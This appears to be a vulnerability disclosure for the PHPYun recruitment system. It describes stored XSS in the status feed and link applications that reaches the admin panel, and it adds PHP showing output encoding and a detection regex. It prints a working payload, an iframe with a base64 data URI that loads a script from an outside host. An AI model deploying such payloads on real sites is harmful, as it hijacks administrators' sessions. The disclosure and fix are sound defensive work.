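### Brief description:
PHPYun talent recruitment system (php云人才系统): frame injection plus stored XSS that crosses into the admin back end
### Detailed description:
We go to phpyun's friends' news feed and post a status: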
`<iframe src=http://www.baidu.com>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4=">`
![14.png](https://images.seebug.org/upload/201409/1100241683e1e4d5d95b03e7b3f2248e531b6b24.png)
Let's see the result:
![15.png](https://images.seebug.org/upload/201409/110027376d66b8956d41d2218fbdcea75aa51917.png)
![16.png](https://images.seebug.org/upload/201409/110027460a73e1a970e22a34609b1c160b8dadda.png)
Let's also check the admin back end to see whether the payload crosses into it, by viewing the friends' feed there:
![19.png](https://images.seebug.org/upload/201409/11003245d488bea2381ba373ff080d1eb1827a57.png)
It executes perfectly.
Here is another case that crosses into the back end, although it is of limited use. We submit a friendly-link application:
![17.png](https://images.seebug.org/upload/201409/11002935d56a172db77fa5c26e089172b0d9ad86.png)
Now look at the administrator's review page:
![18.png](https://images.seebug.org/upload/201409/11003133914052a51d3b09596b47641699392638.png)
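The status feed above renders stored text as live markup in both the member view and the admin view. The following is an added example, not phpyun's own code: it shows the vulnerable output pattern beside an output-encoded one, plus an audit pass for rows that were stored before the fix. All function names and sample rows are hypothetical, and the base64 body is a placeholder.

```php
<?php
// Added example; function names and sample rows are hypothetical, not phpyun code.

// Vulnerable pattern: stored status text is concatenated into the page as-is,
// so an <iframe> or <script> in a status becomes live markup for every viewer.
function render_status_unsafe(string $status): string
{
    return '<div class="status">' . $status . '</div>';
}

// Hardened pattern: encode at output time. The same function has to be used by
// the member-facing feed and by the admin panel's view of that feed.
function render_status(string $status): string
{
    $safe = htmlspecialchars($status, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="status">' . $safe . '</div>';
}

// Audit helper: return the ids of stored rows that already contain frame or
// script markup, a data:text/html URI, or an inline event-handler attribute.
function find_suspect_rows(array $rows): array
{
    $pattern = '/<\s*(iframe|script|object|embed)\b|data:text\/html|\bon[a-z]+\s*=/i';
    $hits = [];
    foreach ($rows as $id => $content) {
        if (preg_match($pattern, $content) === 1) {
            $hits[] = $id;
        }
    }
    return $hits;
}

// Constructed sample rows (the base64 body is replaced with a placeholder).
$rows = [
    101 => 'Looking for a PHP developer role in Shanghai',
    102 => '<iframe src="data:text/html;base64,PLACEHOLDER">',
    103 => 'Interview went well, thanks everyone',
];

foreach ($rows as $id => $content) {
    echo $id, ': ', render_status($content), PHP_EOL;
}
echo 'Rows to review: ', implode(', ', find_suspect_rows($rows)), PHP_EOL;
```

The audit pattern is a triage aid for cleaning up existing rows; the encoding in `render_status` is what stops the markup from executing.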
### Proof of vulnerability: